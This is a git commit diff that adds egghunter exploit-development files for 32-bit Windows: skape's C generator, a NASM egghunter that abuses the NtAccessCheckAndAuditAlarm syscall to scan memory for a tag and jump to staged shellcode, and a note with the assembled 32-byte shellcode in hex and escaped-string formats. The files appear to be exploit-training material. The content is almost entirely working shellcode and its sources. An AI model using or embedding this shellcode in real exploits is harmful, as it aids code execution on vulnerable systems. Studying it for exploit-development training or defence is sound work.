Restructure repo

greyshell · greyshell · commit 5240c034f4e9 · 2023-08-19T03:55:36.000-07:00
diff --git a/artifacts/egghunter_dev/egghunt_sys.c b/artifacts/egghunter_dev/egghunt_sys.c
@@ -0,0 +1,184 @@
+/*
+ * Optimized egghunt shellcode for win32 (32 bytes)
+ *
+ * Description
+ *
+ *    This code works by abusing an NT syscall (NtAccessCheckAndAuditAlaram)
+ *    whereby it uses the kernel to validate whether or not a set of addresses
+ *    is valid, and, if it is, whether or not they match the 8 byte egg we're
+ *    searching for.  The egg byte egg consists of 4 bytes of executable
+ *    assembly that will appear 2 times, once after the other.  For instance,
+ *    the egg 0x50905090 would be used with the following assembly:
+ *
+ *       nop
+ *       push eax
+ *       nop
+ *       push eax
+ *       nop
+ *       push eax
+ *       nop
+ *       push eax
+ *
+ *    When the egg hunter searches for 0x50905090 it will eventually
+ *    match with the above assembly and jump to it, starting at the
+ *    first nop.  
+ *
+ *    The use of NtAccessCheckAndAuditAlarm may have problems if the thread
+ *    is using an impersonation token.  However, this is the most portable
+ *    system call number to use.
+ *
+ * Targets
+ *
+ *    NT/2K/XP/2K3
+ *
+ * Usage
+ *
+ *    $ egghunt.exe
+ *    Usage: egghunt.exe [test | cstyle] [4 byte hex egg] ==> egghunter.exe cstyle 0x57303054
+ *    
+ *    To generate usable code (with an egg of 42 41 42 41):
+ *
+ *    $ egghunt.exe cstyle 0x41424142
+ *
+ *    To test the code:
+ *
+ *    $ egghunt.exe test
+ *
+ * Features/Quirks
+ *
+ *    * No NULLs.
+ *
+ * Disclaimer
+ *
+ *    The author cannot be held responsible for how this code is used.
+ *
+ * Compile
+ *
+ *    cl egghunt.c /link /debug
+ *
+ * Credits
+ *
+ *    Props go out to spoonm, optyx, trew, and johnycsh for optimization
+ *    tips 'n tricks over the course of this shtuff.
+ *
+ * skape
+ * mmiller@hick.org
+ */
+#include <stdio.h>
+
+#define EGG_OFFSET       18
+#define SET_EGG(sc, egg) *(unsigned long *)((sc) + EGG_OFFSET) = (egg)
+
+void __declspec(naked) egghunt_begin()
+{
+	__asm
+	{
+		entry:
+			// You could put an xor edx, edx here to make the search somewhat
+			// quicker, but given page aligned searching, it really isn't that bad
+			// to omit it, and it saves two bytes.
+		loop_inc_page:
+			or    dx, 0x0fff                    // Add PAGE_SIZE-1 to edx
+		loop_inc_one:
+			inc   edx                           // Increment our pointer by one
+		loop_check:
+			push  edx                           // Save edx
+			push  0x2                           // Push NtAccessCheckAndAuditAlarm
+			pop   eax                           // Pop into eax
+			int   0x2e                          // Perform the syscall
+			cmp   al, 0x05                      // Did we get 0xc0000005 (ACCESS_VIOLATION) ?
+			pop   edx                           // Restore edx
+		loop_check_8_valid: 
+			je    loop_inc_page                 // Yes, invalid ptr, go to the next page
+
+		is_egg:
+			mov   eax, 0x50905090               // Throw our egg in eax
+			mov   edi, edx                      // Set edi to the pointer we validated
+			scasd                               // Compare the dword in edi to eax
+			jnz   loop_inc_one                  // No match? Increment the pointer by one
+			scasd                               // Compare the dword in edi to eax again (which is now edx + 4)
+			jnz   loop_inc_one                  // No match? Increment the pointer by one
+
+		matched:
+			jmp   edi                           // Found the egg.  Jump 8 bytes past it into our code.
+	}
+}
+
+void __declspec(naked) egghunt_end()
+{
+	// These first 8 bytes make up our egg
+	__asm
+	{
+		nop
+		push eax
+		nop
+		push eax
+		nop
+		push eax
+		nop
+		push eax
+	}
+
+	printf("Egg has been found.\n");
+
+	exit(0);
+}
+
+void __declspec(naked) egghunt_end_end()
+{
+	__asm ret
+}
+
+int main(int argc, char **argv)
+{
+	if (argc == 1)
+	{
+		fprintf(stdout, "Usage: %s [test | cstyle] [4 byte egg hex (eg: 0x41424142)]\n", argv[0]);
+		return 0;
+	}
+
+	if (!strcmp(argv[1], "test"))
+		egghunt_begin();
+	else if (!strcmp(argv[1], "cstyle"))
+	{
+		unsigned char *start = (unsigned char *)((unsigned char *)egghunt_begin);
+		unsigned char *stop  = (unsigned char *)((unsigned char *)egghunt_end);
+		unsigned char *copy  = NULL;
+		unsigned char *c     = NULL;
+		unsigned long x      = 0, length, y = 0, egg = 0x50905090;
+
+		// Calculate the actual address in memory of the begin/end function based off their relative jmp points.
+		start   += *(unsigned long *)((unsigned char *)egghunt_begin + 1) + 5;
+		stop    += *(unsigned long *)((unsigned char *)egghunt_end + 1) + 5;
+		length   = stop - start;
+
+		if (!(copy = (unsigned char *)malloc(length)))
+		{
+			printf("allocation failed\n");
+			return 0;
+		}
+
+		memcpy(copy, start, length);
+
+		if (argc >= 3)
+			egg = strtoul(argv[2], NULL, 16);
+
+		SET_EGG(copy, egg);
+
+		fprintf(stdout, "// %lu byte egghunt shellcode (egg=0x%.8x)\n\n", length, egg);
+		fprintf(stdout, "unsigned char egghunt[] = \"");
+
+		for (x = 0;
+		     x < length;
+		     x++)
+			fprintf(stdout, "\\x%2.2x", copy[x]);
+
+		fprintf(stdout, "\";\n\n");
+
+		free(copy);
+	}
+	else
+		fprintf(stdout, "%s: invalid option\n", argv[0]);
+
+	return 1;
+}
diff --git a/artifacts/egghunter_dev/egghunter.asm b/artifacts/egghunter_dev/egghunter.asm
@@ -0,0 +1,53 @@
+;egghunter.asm
+
+[BITS 32]
+[SECTION .text]
+
+global _start
+
+_start:
+
+loop_inc_page:
+	; Go to last address in page n (this could also be used to XOR EDX and set the counter to 00000000)
+	or dx, 0x0fff
+
+loop_inc_one:
+	; Go to first address in page n+1
+	inc edx
+
+loop_check:
+	; save edx which holds our current memory location
+	push edx 		
+	; initialize the call to NtAccessCheckAndAuditAlarm 
+	push 0x2
+	pop eax
+	; perform the system call
+ 	int 0x2e
+	; check for access violation, 0xc0000005 (ACCESS_VIOLATION) 
+	cmp al,05
+	; restore edx to check later the content of pointed address
+	pop edx
+
+loop_check_8_valid:
+	; if access violation encountered, go to next page
+	je loop_inc_page 
+
+is_egg:
+	; load egg (W00T in this example)
+	mov eax, 0x54303057
+	; initializes pointer with current checked address
+	mov edi, edx
+	; Compare eax with doubleword at edi and set status flags
+	scasd
+	
+	; No match, we will increase our memory counter by one 
+	jnz loop_inc_one
+	; first part of the egg detected, check for the second part
+	scasd
+	; No match, we found just a location with half an egg
+	jnz loop_inc_one
+
+matched:
+	; edi points to the first byte of our 3rd stage code, let's go!
+	jmp edi 
+
diff --git a/artifacts/egghunter_dev/note-egghunter.txt b/artifacts/egghunter_dev/note-egghunter.txt
@@ -0,0 +1,24 @@
+# EGG SIGNATURE: T00WT00W 
+
+[+] Raw: can be used in the mona 
+6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7
+
+[+] CTP Binary
+66 81 ca ff 0f 42 52 6a 02 58 cd 2e 3c 05 5a 74 ef b8 54 30 30 57 8b fa af 75 ea af 75 e7 ff e7
+
+[+] CTP python version
+"\x66\x81\xca\xff"
+"\x0f\x42\x52\x6a"
+"\x02\x58\xcd\x2e"
+"\x3c\x05\x5a\x74"
+"\xef\xb8\x54\x30"
+"\x30\x57\x8b\xfa"
+"\xaf\x75\xea\xaf"
+"\x75\xe7\xff\xe7"
+
+CTP version:
+"\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
+
+
+
+
